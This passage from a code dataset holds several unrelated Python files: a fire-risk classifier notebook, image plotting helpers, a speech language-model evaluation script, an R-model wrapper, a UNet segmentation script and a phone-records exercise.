\\n'.format(tpr[1])\nprecis_rf = 'precision = {0} \\n \\n'.format(float(cm_rf[1][1]) / (cm_rf[1][1] + cm_rf[0][1]))\n\n\nprint(acc_rf)\nprint(kapp_rf)\nprint(auc_rf)\nprint(recall_rf)\nprint(precis_rf)\n\n\n# In[11]:\n\nfrom sklearn.ensemble import AdaBoostClassifier\nmodel_adaboost = AdaBoostClassifier(n_estimators = 100, random_state=27, algorithm='SAMME.R')\nprint(model_adaboost)\nmodel_adaboost.fit(X_train, y_train)\n#pred_adaboost = model_adaboost.predict(X_validation)\npred_adaboost = model_adaboost.predict(X_test)\n#real_adaboost = y_validation\nreal_adaboost = y_test\ncm_ada = confusion_matrix(real_adaboost, pred_adaboost)\nprint(cm_ada)\n\nkappa_ada = cohen_kappa_score(real_adaboost, pred_adaboost)\n\n#compute ROC curve and area under the curve\n# fpr, tpr, thresholds = metrics.roc_curve(y_validation, pred_adaboost, pos_label=1)\nfpr, tpr, thresholds = metrics.roc_curve(y_test, pred_adaboost, pos_label=1)\nroc_auc = metrics.auc(fpr, tpr)\n\nacc_ada = 'Accuracy = {0} \\n \\n'.format(float(cm_ada[0][0] + cm_ada[1][1]) / len(real_adaboost))\nkapp_ada = 'kappa score = {0} \\n \\n'.format(kappa_ada)\nauc_ada = 'AUC Score = {0} \\n \\n'.format(metrics.auc(fpr, tpr))\nrecall_ada = 'recall = {0} \\n \\n'.format(tpr[1])\nprecis_ada = 'precision = {0} \\n \\n'.format(float(cm_ada[1][1]) / (cm_ada[1][1] + cm_ada[0][1]))\n\nprint(acc_ada)\nprint(kapp_ada)\nprint(auc_ada)\nprint(recall_ada)\nprint(precis_ada)\n\n\n# In[12]:\n\n# The XG Boost model\nmodel_xgboost = XGBClassifier(learning_rate=0.13, n_estimators=1500,\n objective='binary:logistic',nthread=4,seed=27)\nprint(model_xgboost)\nmodel_xgboost.fit(X_train, y_train)\n# pred_xgboost = model_xgboost.predict(X_validation)\npred_xgboost = model_xgboost.predict(X_test)\n# real_xgboost = y_validation\nreal_xgboost = y_test\ncm_xg = confusion_matrix(real_xgboost, pred_xgboost)\nprint(cm_xg)\n\nfrom sklearn.metrics import cohen_kappa_score\nkappa_xg = cohen_kappa_score(real_xgboost, pred_xgboost)\n\nfpr, tpr, thresholds = metrics.roc_curve(y_test, pred_xgboost, pos_label=1)\nroc_auc = metrics.auc(fpr, tpr)\n\nacc_xg = 'Accuracy = {0} \\n \\n'.format(float(cm_xg[0][0] + cm_xg[1][1]) / len(real_xgboost))\nkapp_xg = 'kappa score = {0} \\n \\n'.format(kappa_xg)\nauc_xg = 'AUC Score = {0} \\n 
\\n'.format(metrics.auc(fpr, tpr))\nrecall_xg = 'recall = {0} \\n \\n'.format(tpr[1])\nprecis_xg = 'precision = {0} \\n \\n'.format(float(cm_xg[1][1]) / (cm_xg[1][1] + cm_xg[0][1]))\n\nprint(acc_xg)\nprint(kapp_xg)\nprint(auc_xg)\nprint(recall_xg)\nprint(precis_xg)\n\n\n# ### 6 Feature selection on model with best performance\n\n# In[13]:\n\nprint(\"Start Feature Selection\")\n# ==== Feature Selection using Feature Importance =====\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import accuracy_score\n\n\n# calculate imputed test dataset\nimputed_fireVarTest = fireVarTest.fillna(method=\"ffill\")\nimpute_X_test = np.array(encoded_testdata.drop('fire',axis=1).fillna(method=\"ffill\"))\nimpute_y_test = np.reshape(imputed_fireVarTest.values, [imputed_fireVarTest.shape[0],])\n\n#model for feature selection\nselection_model = RandomForestClassifier(n_estimators = 60, max_depth=3, random_state=27)\n\n# create the list of features with corresponding feature importances\nfeature_importance = pd.Series(data=model_rf.feature_importances_, index=encoded_traindata.drop(['fire'], axis =1).columns)\n\n\n#sort the feature importance from low to hi\nfeature_importance = feature_importance.sort_values()\n# Making threshold smaller\nthresh_num = X_validation.shape[1]\n\nfeature_result = pd.DataFrame(columns=('Last_Feature', 'Thresh', 'Acc', 'Kapp', 'AUC', 'Recall', 'Precis'))\nlow_thresh = feature_importance[0]\n# print(feature_importance[0])\n\n\n# In[14]:\n\n#model for feature selection\nselection_model = RandomForestClassifier(n_estimators = 60, max_depth=3, random_state=27)\n\n# create the list of features with corresponding feature importances\nfeature_importance = pd.Series(data=model_rf.feature_importances_, index=encoded_traindata.drop(['fire'], axis =1).columns)\n\n\n#sort the feature importance from low to hi\nfeature_importance = feature_importance.sort_values()\n# Making threshold smaller\nthresh_num = X_validation.shape[1]\n\nfeature_result = pd.DataFrame(columns=('Last_Feature', 'Thresh', 'Acc', 'Kapp', 'AUC', 'Recall', 'Precis'))\nlow_thresh = feature_importance[0]\nprint(feature_importance[0])\nfor i in range(feature_importance.size-thresh_num, feature_importance.size-2):\n # select features using threshold\n if feature_importance[i] == low_thresh:\n continue\n else:\n low_thresh = feature_importance[i]\n# print(feature_importance[i])\n selection = SelectFromModel(model_rf, threshold=feature_importance[i], prefit=True)\n select_X_train = selection.transform(X_train)\n\n selection_model.fit(select_X_train, y_train)\n\n select_X_test = selection.transform(X_validation)\n y_pred = selection_model.predict(select_X_test)\n predictions = [round(value) for value in y_pred]\n #metric calculation\n fpr, tpr, thresholds = metrics.roc_curve(y_validation, predictions, pos_label=1)\n accuracy = accuracy_score(y_validation, predictions)\n cm = confusion_matrix(y_validation, predictions)\n# print(confusion_matrix(y_validation, predictions))\n\n kappa = cohen_kappa_score(y_validation, predictions)\n acc = float(cm[0][0] + cm[1][1]) / len(y_validation)\n auc = metrics.auc(fpr, tpr)\n recall = tpr[1]\n precis = float(cm[1][1]) / (cm[1][1] + cm[0][1])\n\n# print(\"Thresh=%.3f, n=%d\" % (feature_importance[i], select_X_train.shape[1]))\n# print('Accuracy = {0} \\n \\n'.format(acc))\n# print('kappa score = {0} \\n \\n'.format(kappa))\n# print('AUC Score = {0} \\n \\n'.format(auc))\n# print('recall = {0} \\n \\n'.format(recall))\n# print('precision = {0} \\n \\n'.format(precis))\n\n 
feature_result.loc[i] = [feature_importance.index[i], feature_importance[i], acc, kappa, auc, recall, precis]\n\n#find the best f1\nfeature_result['F1'] = 2* (feature_result['Recall']*feature_result['Precis']) / (feature_result['Recall']+feature_result['Precis'])\nmax_f1 = feature_result['F1'].idxmax()\nbest_row = feature_result.loc[max_f1]  # reuse the index computed above\nprint(\"best row:\")\nprint(best_row)\n\n\n# In[15]:\n\nfeature_result.to_csv(\"{0}Feature_Selection_Results{1}.csv\".format(inter_path,datetime.datetime.now().strftime('%m%d-%H%M%S')), mode='a')  # fixed: the bare 'a' was being passed as the sep argument\n\n\n# ### 7 grid search\n\n# In[16]:\n\n# grid search on random forest \nthres = feature_result.loc[feature_result['F1'] == feature_result['F1'][max_f1]]\n\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import TimeSeriesSplit\n\n\nselection = SelectFromModel(model_rf, threshold=thres.iloc[0]['Thresh'], prefit=True)\nselect_X_train = selection.transform(X_train)\nselect_X_test = selection.transform(impute_X_test)\n\nscores=['recall_macro']\ntscv = TimeSeriesSplit(n_splits=3)\n\ntuned_parameters= {'n_estimators':[1,10,50, 60,100,500],\n                   'max_depth':[None,3,5,10,20],\n                   'max_features':['sqrt','log2']}\nprint (\"## Tuning for %s\"%model_rf)\nfor score in scores:\n    print(\"# Tuning hyper-parameters for %s\" % score)\n    print()\n\n    clf = GridSearchCV(model_rf, tuned_parameters, cv=tscv,scoring= score)\n    print('Model set up')\n    clf.fit(select_X_train, y_train)\n\n    print(\"Best parameters set found on development set:\")\n    print()\n    print(clf.best_params_)\n    print()\n    print(\"Grid scores on development set:\")\n    print()\n    means = clf.cv_results_['mean_test_score']\n    stds = clf.cv_results_['std_test_score']\n    for mean, std, params in zip(means, stds, clf.cv_results_['params']):\n        print(\"%0.3f (+/-%0.03f) for %r\"% (mean, std * 2, params))\n    print()\n\n    print(\"Detailed classification report:\")\n    print()\n    print(\"The model is trained on the full development set.\")\n    print(\"The scores are computed on the full evaluation set.\")\n    print()\n    y_true, y_pred = y_test, clf.predict(select_X_test)\n    print(classification_report(y_true, y_pred))\n    print()\n\n\n# In[17]:\n\n# grid search on adaboost\ntuned_parameters={'algorithm': ['SAMME','SAMME.R'],'n_estimators':[1,10,100,1000,10000]}\nprint (\"## Tuning for %s\"%'adaboost')\nscore='recall_macro'\ntscv = TimeSeriesSplit(n_splits=3)\nprint(\"# Tuning hyper-parameters for %s\" % score)\nprint()\n\nclf = GridSearchCV(model_adaboost, tuned_parameters, cv=tscv,scoring= score)\nprint('Model set up')\nclf.fit(select_X_train, y_train)\n\nprint(\"Best parameters set found on development set:\")\nprint()\nprint(clf.best_params_)\nprint()\nprint(\"Grid scores on development set:\")\nprint()\nmeans = clf.cv_results_['mean_test_score']\nstds = clf.cv_results_['std_test_score']\nfor mean, std, params in zip(means, stds, clf.cv_results_['params']):\n    print(\"%0.3f (+/-%0.03f) for %r\"% (mean, std * 2, params))\nprint()\n\nprint(\"Detailed classification report:\")\nprint()\nprint(\"The model is trained on the full development set.\")\nprint(\"The scores are computed on the full evaluation set.\")\nprint()\ny_true, y_pred = y_test, clf.predict(select_X_test)\nprint(classification_report(y_true, y_pred))\nprint()
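\n\n# --- Illustrative aside (added; not part of the original notebook) ---\n# GridSearchCV with TimeSeriesSplit only gives an honest forward-chaining\n# evaluation if the rows of select_X_train are in chronological order; a\n# minimal sketch of how the folds are laid out:\n#\n#   from sklearn.model_selection import TimeSeriesSplit\n#   import numpy as np\n#   X_demo = np.arange(8).reshape(-1, 1)\n#   for tr, te in TimeSeriesSplit(n_splits=3).split(X_demo):\n#       print(tr, te)  # train indices always precede test indices\n#\n# which prints [0 1] [2 3], then [0 1 2 3] [4 5], then [0 1 2 3 4 5] [6 7].\n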
\n\n# ### 8 test on the test data\n\n# In[18]:\n\n#test on the test data\ntuned_model = RandomForestClassifier(n_estimators = 500, max_depth=10, random_state=27,max_features='log2')\ntuned_model.fit(select_X_train, y_train)\ny_pred = tuned_model.predict(select_X_test)\npredictions = [round(value) for value in y_pred]\nfpr, tpr, thresholds = metrics.roc_curve(impute_y_test, predictions, pos_label=1)\naccuracy = accuracy_score(impute_y_test, predictions)\ncm = confusion_matrix(impute_y_test, predictions)\nprint(confusion_matrix(impute_y_test, predictions))\n\nkappa = cohen_kappa_score(impute_y_test, predictions)\nacc = float(cm[0][0] + cm[1][1]) / len(impute_y_test)\nauc = metrics.auc(fpr, tpr)\nrecall = tpr[1]\nprecis = float(cm[1][1]) / (cm[1][1] + cm[0][1])\n\nprint('Final Test Data Results')\nprint(\"Thresh=%.3f, n=%d\" % (thres.iloc[0]['Thresh'], select_X_test.shape[1]))  # fixed: %d truncated the small float threshold to 0\nprint('Accuracy = {0} \\n \\n'.format(acc))\nprint('kappa score = {0} \\n \\n'.format(kappa))\nprint('AUC Score = {0} \\n \\n'.format(auc))\nprint('recall = {0} \\n \\n'.format(recall))\nprint('precision = {0} \\n \\n'.format(precis))\n\n\n#Tree model for getting features importance\nclf = ExtraTreesClassifier()\n\nclf = clf.fit(X_train, y_train)\n\n\nUsedDf = encoded_traindata.drop('fire',axis=1)\nimportant_features = pd.Series(data=clf.feature_importances_,index=UsedDf.columns)\nimportant_features.sort_values(ascending=False,inplace=True)\n#top 20 features\nprint(important_features[0:20])\n\n#Plotting the top 20 features\ny_pos = np.arange(len(important_features.index[0:20]))\n\nplt.bar(y_pos,important_features.values[0:20], alpha=0.3)\nplt.xticks(y_pos, important_features.index[0:20], rotation = (90), fontsize = 11, ha='left')\nplt.ylabel('Feature Importance Scores')\nplt.title('Feature Importance')\n\n\n# Write model performance to log file:\nlog_path = os.path.join(curr_path, \"log/\")\nimportant_features[0:50].to_csv('{0}FeatureImportanceList_{1}.csv'.format(log_path, datetime.datetime.now().strftime('%m%d-%H%M%S')), mode='a')  # fixed: 'a' was being passed as the sep argument\n\n\n# #### 8.1 Distribution of census block at each risk level\n\n# In[19]:\n\nproba = tuned_model.predict_proba(select_X_test)\nplt.hist(proba[:,1],bins=[0,0.3, 0.7,1])\n\n\n# #### 8.2 ROC curve\n\n# In[25]:\n\nfrom sklearn.model_selection import TimeSeriesSplit\n# from sklearn.model_selection import KFold\nfrom scipy import interp\n\nmodels = [model_adaboost,model_xgboost,tuned_model]\nsignature = [\"adaboost\",\"xgboost\",\"RF\"] 
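\n\n# --- Illustrative aside (added; not part of the original notebook) ---\n# The loop below averages per-fold ROC curves by interpolating every fold's\n# TPR onto a common FPR grid (scipy's interp is an alias of numpy's):\n#\n#   mean_fpr = np.linspace(0, 1, 100)\n#   tpr_on_grid = np.interp(mean_fpr, fpr, tpr)  # fpr must be increasing\n#   tpr_on_grid[0] = 0.0                         # pin the curve at (0, 0)\n#\n# Averaging the interpolated curves then gives the mean ROC and its band.\n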
\nfor d in range(len(models)):\n    model=models[d]\n    print(model)\n    tprs = []\n    aucs = []\n    mean_fpr = np.linspace(0, 1, 100)\n    # 7-fold time series cv because training data contains 8 years of records.\n    tscv = TimeSeriesSplit(n_splits=7)\n    # cv = KFold(n_splits=10)\n    i = 0\n    plt.figure(figsize=(8,6))\n    for train, test in tscv.split(select_X_train, y_train):\n        probas_ = model.fit(select_X_train[train], y_train[train]).predict_proba(select_X_train[test])\n        # Compute ROC curve and area the curve\n        fpr, tpr, thresholds = metrics.roc_curve(y_train[test], probas_[:,1])\n        tprs.append(interp(mean_fpr, fpr, tpr))\n        tprs[-1][0] = 0.0\n        roc_auc = metrics.auc(fpr, tpr)\n        aucs.append(roc_auc)\n        plt.plot(fpr, tpr, lw=1, alpha=0.3,\n                 label='ROC fold %d (AUC = %0.2f)' % (i, roc_auc))\n\n        i += 1\n    plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n             label='Luck', alpha=.8)\n\n    mean_tpr = np.mean(tprs, axis=0)\n    mean_tpr[-1] = 1.0\n    mean_auc = metrics.auc(mean_fpr, mean_tpr)\n    std_auc = np.std(aucs)\n    plt.plot(mean_fpr, mean_tpr, color='b',\n             label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n             lw=2, alpha=.8)\n\n    std_tpr = np.std(tprs, axis=0)\n    tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n    tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n    plt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n                     label=r'$\\pm$ 1 std. dev.')\n\n    plt.xlim([-0.05, 1.05])\n    plt.ylim([-0.05, 1.05])\n    plt.xlabel('False Positive Rate')\n    plt.ylabel('True Positive Rate')\n#     plt.title('Receiver operating characteristic example')\n    plt.legend(loc=\"lower right\")\n    features_png = \"{0}roc_{1}_{2}.png\".format(png_path, signature[d], datetime.datetime.now().strftime('%m%d-%H%M%S'))  # fixed: removed a stray 'a' argument\n    plt.savefig(features_png, dpi=150)\n    plt.show()\n\n\n\n\n\n","repo_name":"Eve-Chen/fire_risk_residential","sub_path":"risk_model_residential_kdd.py","file_name":"risk_model_residential_kdd.py","file_ext":"py","file_size_in_byte":35291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"33725821687","text":"''' Set of functions for plotting results of using classes in\nradial_split.py & color_density.py '''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef plot_radial_splits(img_file, rs, ax, color='r'):\n    '''Displays an image with the radial split overlay\n\n    Parameters\n    ----------\n    img_file: str\n        Path to image file\n    rs: RadialSplitter object\n        Instance of the RadialSplitter class from radial_split.py\n    ax: matplotlib Axes\n        Axes in which to display the image\n    color: str or tuple\n        Color for overlay lines (argument for matplotlib functions)\n    '''\n\n    img = plt.imread(img_file)  # read image file\n    _ = rs.split(img)  # apply RadialSplitter to generate vertices\n    vs = rs.vertices[:, :, ::-1].copy()  # get vertices of splits\n\n    for y in range(rs.nqslices * 4 + 1):  # loop that will cover every segment\n        for r in range(rs.nrings):\n            ax.plot(*[vs[r:r + 2, y, i]\n                      for i in [0, 1]], color=color, linewidth=2)\n            ax.plot(*[vs[r, y:y + 2, i]\n                      for i in [0, 1]], color=color, linewidth=2)\n\n    for a in ['bottom', 'top', 'left', 'right']:  # color borders\n        ax.spines[a].set_color(color)\n        ax.spines[a].set_linewidth(2)\n\n    ax.set_xticks([])\n    ax.set_yticks([])  # remove ticks\n    ax.imshow(img)  # add image\n\n\ndef plot_color_histogram(img_file, cd, ax, color='r', annot=None, annot_size=10):\n    '''Displays color histogram from an image\n\n    Parameters\n    ----------\n    img_file: str\n        Path to image file\n    cd: ColorDensity object\n        Instance of the ColorDensity class from color_density.py\n    ax: matplotlib Axes\n        Axes in which to display the image\n    color: str or tuple\n        Color for vertical lines and annot\n        (argument for matplotlib functions)\n    annot: None or iterable\n        If not None, must be an iterable of equal length of\n        the nsegs attribute of cd.\n    annot_size: int\n        Fontsize for annotation\n    '''\n\n    hist = cd.fit_transform([img_file])[0]  # get histogram\n    bps = int(len(hist) / cd.nsegs)  # bars per segment\n    cmap = bar_color_map(cd.n_bins)  # colormap for bars\n\n    bar_cmap = []  # need to create cmap that matches hist length\n    for n in range(cd.nsegs):\n        bar_cmap.extend(cmap)  # duplicate cmap for each segment\n        bar_cmap.append([0, 0, 0])  # add dummy zero for spacing\n\n    y_val = []  # need to extend hist values to allow spacing\n    for i in range(cd.nsegs):\n        y_val.extend(hist[i * bps:(i + 1) * bps])  # this segment of hist\n        y_val.append(0)  # add dummy zero for spacing\n\n    # extend by nsegs to account for spaces we added\n    x_val = range(len(hist) + cd.nsegs)\n\n    bars = ax.bar(x=x_val, height=y_val)  # plot bars\n    for i in range(1, cd.nsegs):  # add vertical lines at spacing\n        ax.axvline((i * bps) + ((i - 1) * 1), linestyle=':', color=color)\n\n    for idx, b in enumerate(bars):  # for each bar\n        b.set_color(bar_cmap[idx])  # apply 
correct color\n b.set_edgecolor('k') # add edge color\n\n # remove ticks, set limit, add axis labels\n ax.set_xticks([])\n ax.set_xlim(-1, len(x_val))\n ax.set_xlabel('Color bin')\n ylab = 'Density' if cd.nsegs == 1 else 'Density within segment'\n ax.set_ylabel(ylab)\n\n if cd.nsegs > 1:\n y = ax.get_ylim()[1] * 0.95 # where to add annotation\n offset = ax.get_xlim()[1] / (2 * cd.nsegs)\n for i in range(cd.nsegs):\n x = (i * bps) + ((i - 1) * 1) + offset # where to add annotation\n s = 'Segment {}'.format(i + 1) # label\n if annot is not None: # if extra description supplied\n s += '\\n' + annot[i]\n ax.text(x=x, y=y, s=s, color=color, fontsize=annot_size,\n va='top', ha='center')\n\n\ndef bar_color_map(nbins=3):\n ''' Get list of RGB color shades for color histogram plot\n\n Parameters\n ----------\n nbins: int\n the number of bins used to generate histograms\n (i.e. n_bins argument into the ColorDensity object used)\n\n Returns\n -------\n cmap: numpy array\n Array of shape (nbins**3, 3), where each row contains the\n numeric definition of RGB color shade\n '''\n step = 1 / nbins # steps to take\n # we start by defining the midpoint of each bin\n perc = np.arange(step / 2, 1 + (step / 2), step=step)\n # perform loop to get the RGB values for the nbins**3 shades\n cmap = np.array([[a, b, c] for a in perc for b in perc for c in perc])\n return cmap\n","repo_name":"subhalingamd/multimodal-meme-classification","sub_path":"codes/github_package_downloads/radialColorHistogram-master/plotting_functions.py","file_name":"plotting_functions.py","file_ext":"py","file_size_in_byte":4698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31676555297","text":"import os\nimport hydra\nfrom omegaconf import DictConfig, OmegaConf\nimport yaml\nimport pickle\nfrom tqdm import tqdm\n\nimport numpy as np\nimport torch\n\nfrom zerospeech_lm.models.utils import reset_hidden, load_checkpoint\nfrom zerospeech_lm.models.lm import LSTM_model, QRNN_model\nfrom zerospeech_lm.models.clustering import load_clustering\n\n\ndef eval_model(model, clustering, epoch, args, dev_only=True):\n create_submission_folder(epoch, args)\n\n splits = ['dev']\n if not dev_only:\n splits.append('test')\n\n for split in splits:\n model.eval()\n if clustering is None:\n quantized_eval(model, epoch, split, args)\n else:\n feature_eval(model, clustering, epoch, split, args)\n\ndef feature_eval(model, clustering, epoch, split, args):\n split_dir = os.path.join(args.eval_data_dir, 'lexical', split)\n hidden_state = reset_hidden(args, eval=True)\n\n with torch.no_grad(), \\\n open(os.path.join(args.save_dir, 'outputs', str(epoch), 'lexical', split + '.txt'), 'w') as out_file:\n for file_name in tqdm(os.listdir(split_dir), desc='Evaluating model on {} split'.format(split), ascii=True):\n if file_name[-4:] != '.npy':\n continue\n\n seq = np.load(os.path.join(split_dir, file_name)).astype(float)\n\n clustered_seq = clustering.predict(seq).reshape(1, -1)\n clustered_seq = torch.from_numpy(clustered_seq).to(torch.int64)\n x = clustered_seq[:, :-1].to(args.device)\n y = clustered_seq[:, 1:].to(args.device)\n \n score = 0.\n probs, _ = model(x, hidden_state)\n print(probs.shape)\n for i in range(y.size(1)):\n score += probs[0,i,y[0,i]].item()\n\n out_file.write('{} {}\\n'.format(file_name[:-4], score))\n\ndef quantized_eval(model, epoch, split, args):\n hidden_state = reset_hidden(args, eval=True)\n tasks = ['syntactic', 'lexical']\n for task in tasks:\n split_dir = 
os.path.join(args.eval_data_dir, task, split)\n\n with torch.no_grad(), \\\n open(os.path.join(args.save_dir, 'outputs', str(epoch), task, split + '.txt'), 'w') as out_file, \\\n open(os.path.join(split_dir, 'quantized_outputs.txt')) as in_file:\n\n quants = in_file.readlines()\n\n for line in tqdm(quants, desc='Evaluating model on {} task {} split'.format(task, split), ascii=True):\n file_name, seq = line.split()\n seq = np.array(seq.split(','), dtype=np.int32)\n seq = torch.tensor(seq).to(torch.int64)\n if args.inverse_seqs:\n seq = seq.flip(0) # flip sequences for backward training\n x = seq[:-1].reshape(1,-1).to(args.device)\n y = seq[1:].reshape(1,-1).to(args.device)\n \n score = 0.\n probs, _ = model(x, hidden_state)\n for i in range(y.size(1)):\n score += probs[0,i,y[0,i]].item()\n\n out_file.write('{} {}\\n'.format(file_name, score))\n\ndef calculate_entropy(model, data, epoch, args):\n path = os.path.join(args.save_dir, 'entropy', str(epoch))\n if not os.path.exists(path):\n os.makedirs(path)\n\n hidden_state = reset_hidden(args, eval=True)\n dd = {}\n with torch.no_grad(), \\\n open(os.path.join(args.save_dir, 'entropy', str(epoch), 'entropy'), 'wb') as out_file:\n for seq, file_name in tqdm(data, desc='Calculating entropy', ascii=True):\n seq = torch.tensor(seq).to(torch.int64)\n x = seq[:-1].reshape(1,-1).to(args.device)\n probs, _ = model(x, hidden_state)\n entropy = (probs[0] * torch.exp(probs[0])).sum(1).cpu().numpy()\n dd[file_name] = entropy\n pickle.dump(dd, out_file)\n\ndef create_submission_folder(epoch, args):\n # main folder\n path = os.path.join(args.save_dir, 'outputs', str(epoch))\n if not os.path.exists(path):\n os.makedirs(path)\n \n # task-specific folders\n for sub_name in ['lexical', 'phonetic', 'semantic', 'syntactic']:\n sub_path = os.path.join(path, sub_name)\n if not os.path.exists(sub_path):\n os.makedirs(sub_path)\n \n # meta.yaml file\n meta_dict = {\n 'author': 'author',\n 'affiliation': 'affiliation',\n 'description': 'description',\n 'open_source': False,\n 'train_set': 'LibriSpeech',\n 'gpu_budget': 1,\n 'parameters': {\n 'phonetic': {\n 'metric': 'euclidean',\n 'frame_shift': 1\n },\n 'semantic': {\n 'metric': 'euclidean',\n 'pooling': 'min'\n }\n }\n }\n yaml.dump(meta_dict, open(os.path.join(path, 'meta.yaml'), 'w'))\n\n print('Submission folder for epoch {} created'.format(epoch))\n\n\n@hydra.main(config_path='../configs', config_name='config')\ndef eval(args):\n if args.quantized:\n clustering = None\n args.n_clusters += 1\n else:\n clustering = load_clustering(args)\n\n if args.arch == 'LSTM':\n model = LSTM_model(args.n_clusters, args)\n elif args.arch == 'QRNN':\n model = QRNN_model(args.n_clusters, args)\n else:\n raise ValueError('Architecture not valid')\n model.to(args.device)\n \n resume_epoch = 0\n model, _, resume_epoch = load_checkpoint(model, args)\n\n if args.nGPU > 1:\n model = torch.nn.DataParallel(model)\n print(model, '\\n')\n\n eval_model(model, clustering, resume_epoch-1, args, dev_only=args.dev_only)\n\n\nif __name__ == '__main__':\n eval()","repo_name":"chorowski-lab/zs2021","sub_path":"zerospeech_lm/scripts/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"20056473616","text":"import os\nimport rpy2.robjects as ro\nfrom rpy2.robjects import pandas2ri\n\nclass Model:\n def __init__(self, path):\n self.path = path\n\n def evaluate(self, x) -> list:\n pass\n\nclass RModel(Model):\n 
def __init__(self, \n r_file_path,\n r_function,\n param_names,\n strata,\n population=None):\n path = os.path.abspath(r_file_path)\n r = ro.r\n r.setwd(os.path.dirname(path))\n r.source(os.path.basename(path))\n make_simulation_func = ro.globalenv[r_function]\n\n self.simulate_func = make_simulation_func(\n population,\n param_names,\n strata\n )\n\n def evaluate(self, x) -> list:\n return self.simulate_func(x)\n\n\nstrata = ['y{}_{}'.format(i, i+4) for i in range(50, 85, 5)]\n# Input parameter names \nparam_names = ['.p_progression_cancer_s1_2'] * len(strata)\nr_file_path = '../../models/endometrium/calibration_wrapper.R'\nr_function = 'calibration.simulation'\n\nec_model = RModel(r_file_path, r_function, param_names, strata, 'bleeding')\nresult = ec_model.evaluate([.1 for e in param_names])\nprint(result)","repo_name":"david-gomez-guillen/phd","sub_path":"notebooks/optimization/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1616749661","text":"import os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom algorithm.unet.unet.unet_model import UNet\nfrom algorithm.unet.utils.dataset import BasicDataset\n\n\ndef predict_img(net,\n full_img,\n device,\n scale_factor=1,\n out_threshold=0.5):\n net.eval()\n\n img = torch.from_numpy(BasicDataset.preprocess(full_img, scale_factor))\n\n img = img.unsqueeze(0)\n img = img.to(device=device, dtype=torch.float32)\n\n with torch.no_grad():\n output = net(img)\n\n if net.n_classes > 1:\n probs = F.softmax(output, dim=1)\n else:\n probs = torch.sigmoid(output)\n\n probs = probs.squeeze(0)\n\n tf = transforms.Compose(\n [\n transforms.ToPILImage(),\n transforms.Resize(full_img.size[1]),\n transforms.ToTensor()\n ]\n )\n\n probs = tf(probs.cpu())\n full_mask = probs.squeeze().cpu().numpy()\n\n return full_mask > out_threshold\n\n\ndef get_output_filenames(args):\n out_path = ''\n input_split = os.path.splitext(args)\n name_split = input_split[0].split(\"/\")\n for i in range(len(name_split) - 1):\n out_path = out_path + name_split[i] + \"/\"\n out_path = out_path + '{}_out{}'.format(name_split[-1], input_split[1])\n return out_path\n\n\ndef mask_to_image(mask):\n return Image.fromarray((mask * 255).astype(np.uint8))\n\n\ndef unet_semantic(img_path):\n in_files = img_path\n out_path = get_output_filenames(img_path)\n # model_path = \"MODEL.pth\"\n model_path = os.path.dirname(__file__) + \"/MODEL.pth\"\n pretrained = torch.load(model_path)\n net = UNet(n_channels=3, n_classes=1)\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n net.to(device=device)\n net.load_state_dict(torch.load(model_path, map_location=device))\n\n img = Image.open(in_files)\n\n mask = predict_img(net=net,\n full_img=img,\n scale_factor=0.5,\n out_threshold=0.5,\n device=device)\n\n result = mask_to_image(mask)\n result.save(out_path)\n return out_path\n","repo_name":"buaa-gavin/zhanying","sub_path":"backend/algorithm/unet/UnetSemantic.py","file_name":"UnetSemantic.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"10690418160","text":"#!/usr/bin/python\n#_*_ coding:utf8 _*_\n\n#My result:\n\"\"\"\nThe numbers called by people in Bangalore have 
codes:\n022\n040\n04344\n044\n04546\n0471\n080\n0821\n7406\n7795\n7813\n7829\n8151\n8152\n8301\n8431\n8714\n9008\n9019\n9035\n9036\n9241\n9242\n9341\n9342\n9343\n9400\n9448\n9449\n9526\n9656\n9738\n9740\n9741\n9742\n9844\n9845\n9900\n9961\n24.81 percent of calls from fixed lines in Bangalore are calls to other fixed lines in Bangalore.\n\"\"\"\n\nimport csv\nwith open('texts.csv', 'r') as f:\n    reader = csv.reader(f)\n    texts = list(reader)\nwith open('calls.csv', 'r') as f:\n    reader = csv.reader(f)\n    calls = list(reader)\n\ndef number_called_by_bangalore(input_csv):\n\t#def_var area:\n\tnumber_called_by_bangalore_list = []\n\t#step1: collect every number prefix (area code or mobile prefix) called from Bangalore.\n\tfor i in input_csv:\n\t\tif \"(080)\" in i[0]:\n\t\t\tif \"(0\" in i[1] and i[1][4] == \")\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][1:4])\n\t\t\telif \"(0\" in i[1] and i[1][5] == \")\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][1:5])\n\t\t\telif \"(0\" in i[1] and i[1][6] == \")\" :\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][1:6])\n\t\t\tif i[1][0] == \"7\" or i[1][0] == \"8\" or i[1][0] == \"9\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][0:4])\n\t\t\tif i[1][0:3] == \"140\":\n\t\t\t\tnumber_called_by_bangalore_list.append(i[1][0:3])\n\t#step2: build the result string for return (dedupe, sort, one prefix per line).\n\tnumber_called_by_bangalore_list = \"\\n\".join(sorted(set(number_called_by_bangalore_list)))\n\tfeedback_string = \"The numbers called by people in Bangalore have codes:\" + \"\\n\" 